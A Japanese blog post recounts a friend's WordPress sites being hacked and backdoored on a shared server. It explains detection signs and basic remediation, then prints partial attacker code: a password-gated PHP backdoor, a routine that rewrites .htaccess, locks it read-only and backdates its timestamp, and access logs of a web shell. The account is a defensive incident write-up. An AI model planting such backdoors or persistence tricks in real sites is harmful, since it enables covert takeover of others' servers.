見出し画像

【恐怖体験】WordPressで作ったブログを放置してたら起きたこと

ゴトー

WordPressで作ったブログ、放置してない?

[警告]
寝るまえに読まないでください。
※不安になって寝付けないことがあるらしい。







警告はしたよ?w

あなたのブログ、知らないうちに誰かが住み着いてるかもしれない・・・。

【恐怖】SID GIFARIくんが住み着いてた!

「誰やねん?」って感じですが。

でも察しの良い方なら、もーおわかりですね。

この方、Hackerです!!

画像5

で何があったかっていうと、WordPressで作ったブログ5つがHACKされてた!!



友達がね( *´艸`)ププッ♪

イヤ本当だからね?僕じゃないから〜(ノД`)アアーン


ありのままに起こった事を話すぜ!


いやっ、コレすっごい手が込んでて
ちょっと感動なんだってば!


この改竄されまくったブログたち
表面上は全く問題なく動いてたのですよー。


めちゃめちゃ巧妙で
ブログが少しずつ侵食されていたのです。

下手すると気付けないかも!


今回はたまたま
ブログをチェックするときに
.htaccessを開いたので改竄に気付きました。

そんでindex.phpとかのソースを読むと
バックドアが仕掛けれてたんドゥエーす!


だから好きなプログラムをUPLOADして
何でも実行できちゃう。

さ〜ら〜に〜


最初に侵入されたと思われるブログは、
いつの間にかDBの接続が
海外リモートサーバーになってる。

気付いたらDBは日本から遠い土地にある『FREE MYSQL』ってところ。

画像4


いやーオソロシア!オソロシア!

※アクセスログからIPを追ったらロシアだった。
プロキシだと思うけど。


さらにさらにスゴイことに
.htaccessとかindex.phpとかを編集しようとすると
編集できないんです!

FTPでログインして
ファイルの内容を変更したり
パーミション(権限)を変更しようとしても・・・
保存したら元に戻ってる!


画像6

※まさにポルナレフ状態


自分ではファイルを編集して保存したつもりになってるから
ああ恐ろしい〜。


これはバックグラウンドで
別のプログラムが動いてるのが原因でした。


ちょっとだけ専門的な話なんだけど
バックグラウンドで動いてるプログラムが
ファイルをオープンしっぱなしにしてたっぽいのよ。
(ファイルのリソースを掴んじゃってるというか)

そうすると他の人が上書きできないからね。
いやーすごく丁寧な仕事するよね〜。


だからレンタルサーバーの
コンパネからそのプログラムのプロセスを直接切って
ようやくファイルをイジれるようになりました。

※l.phpって名前のプログラムが動いてたよ。


あ、あとね。
index.phpやabout.phpにアクセスがあると

l.phpを動かして
.htaccessファイルを上書きするようになってたから
ブログにアクセスがあるうちは作業できないと思います。


そんでこっからがMAX恐ろしい!

同じサーバー内で展開してた5つのブログが
軒並み汚染されているという・・・


つまり同じサーバー内で
複数のブログを立ち上げてる場合

<例>
/account/a-blog
    /b-blog
    /c-blog

ここでc-blogが汚染されると
他の全てのブログも汚染されちゃう。

いくらa-blogのセキュリティをバリバリにして
最新のwordpressとpluginにしても
c-blogのバージョンが古かったり
脆弱性がそのまま残ってたら意味ないのよ!


実際、最初にHackされてることに気付いたブログは
インストールしたばかりの最新Wordpressだったから
「なんでー?」
って2人で小一時間考えちゃったんだよね。


もし最近ログインしてないで
放置しまくってるサイトが
同じサーバー内にあるなら

きぃーをーつけて〜〜〜ね〜〜〜


見分け方なんだけど
.htaccessやindex.phpに見覚えのない記述があったり。
wp-content/plugins/sid/とか
なぞのフォルダがあってたらやられてます^^;


あとはログをみると分かる。

アクセスログのpostリクエストをチェックすると
plugins/sid/xxxをUPしてたり
getリクエストで
plugins/sid/xxxにアクセスしてたりする。


いやーこの後ゾッとして
全部のwordpressを最新にして
プラグインを全部アップデートして
セキュリティプラグインを入れました。

というわけで
SID GIFARI君には要注意。
ググルといっぱい痕跡でてくる。

ってか最後まで名前の読み方がわからんかった。
発音記号も署名しておいて欲しいw


ヒーリンググッド作業〜
お大事に♪


Q. 対策はどうすれば良い?

とりあえず放置Wordpressがある場合は
『WP本体とプラグインをUPDATEしておく』
ってのが最低限かなと!

あとは定期的なバックアップが良いと思います。

バックアップさえあれば
ココナラで人にWordpressの復旧を頼んだりできますから〜。

Q. なぜハッキングに気づいた?

ハジマリはこうでした。
いつものようにWordPressにログインしようとしたけど、何故かできない。

「セキュリティのために入れたSiteGuard WP Pluginが原因かな?」※SiteGuard WP Pluginを入れるとログインURLが変わる

そう思って.htaccessをチェックすると
このプラグインのための記述がなくなってたらしい。

「あれあれ?」
と思って.htaccessに直接追記したが上手く動かない。

ここで僕に相談がきたわけです。

Q. SIDくんはSNSにいる?

このような署名というとか、サインを残していただきました。

画像2

Mass Defacement Script By Yunus Incredibl (← hacking groupのお友達?)

の下のところ・・・

Facebookのアカウントを堂々と載せているんですが・・・

なんと実在してましたw

画像3

え?お友達申請できる・・・?

なぜにItachi Uchihaなんだ。。

無限月読でも使うというのか・・・

改竄されたソースを一部公開

■.htaccess

<FilesMatch ".(py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>​

■index.php

<?php
@set_time_limit(0);
@error_reporting(0); 
if(get_magic_quotes_gpc()){
 foreach($_POST as $key=>$value){
  $_POST[$key] = stripslashes($value);
 }
}
$pass = false;
$auth_key = "xxxxxxxxx一応伏せときますxxxxxxxxxxx";
a();
if (isset($_COOKIE['pass'])) {
 if($_COOKIE['pass'] == $auth_key) {
  $pass = true;
 }
} else {
 if (isset($_POST['pass'])) {
  if($_POST['pass'] == $auth_key) {
   setcookie("pass", $_POST['pass']); $pass = true;
  }
 }
}

〜省略〜

@base64_decode($content);
if (file_exists($htaccess)) {
 $htaccess_content = file_get_contents($htaccess);
 if ($content == $htaccess_content) { return; } 
}
@chmod($htaccess, 0777);
@unlink($htaccess);
@file_put_contents($htaccess, $content);
@chmod($htaccess, 0444);
@touch($htaccess, strtotime('-400 days', time()));

■access_log

被害にあったブログ.com 
snipster22.go.mail.ru - - 
[29/Jan/2021:02:43:30 +0900] 
"GET /wp-content/plugins/sid/sidwso.php HTTP/1.1" 
200 16144 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/

被害にあったブログ.com 
unn-212-102-51-226.cdn77.com - - 
[29/Jan/2021:02:38:45 +0900] 
"POST /wp-content/plugins/sid/sidwso.php HTTP/1.1" 
200 13486 "http://被害にあったブログ.com/wp-content/plugins/sid/sidwso.php" 
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36"

■/wp-content/plugins/sid

画像1

以上となります。

あー疲れた。

1円にもならね。


「投げ銭」って知ってる?





いいなと思ったら応援しよう!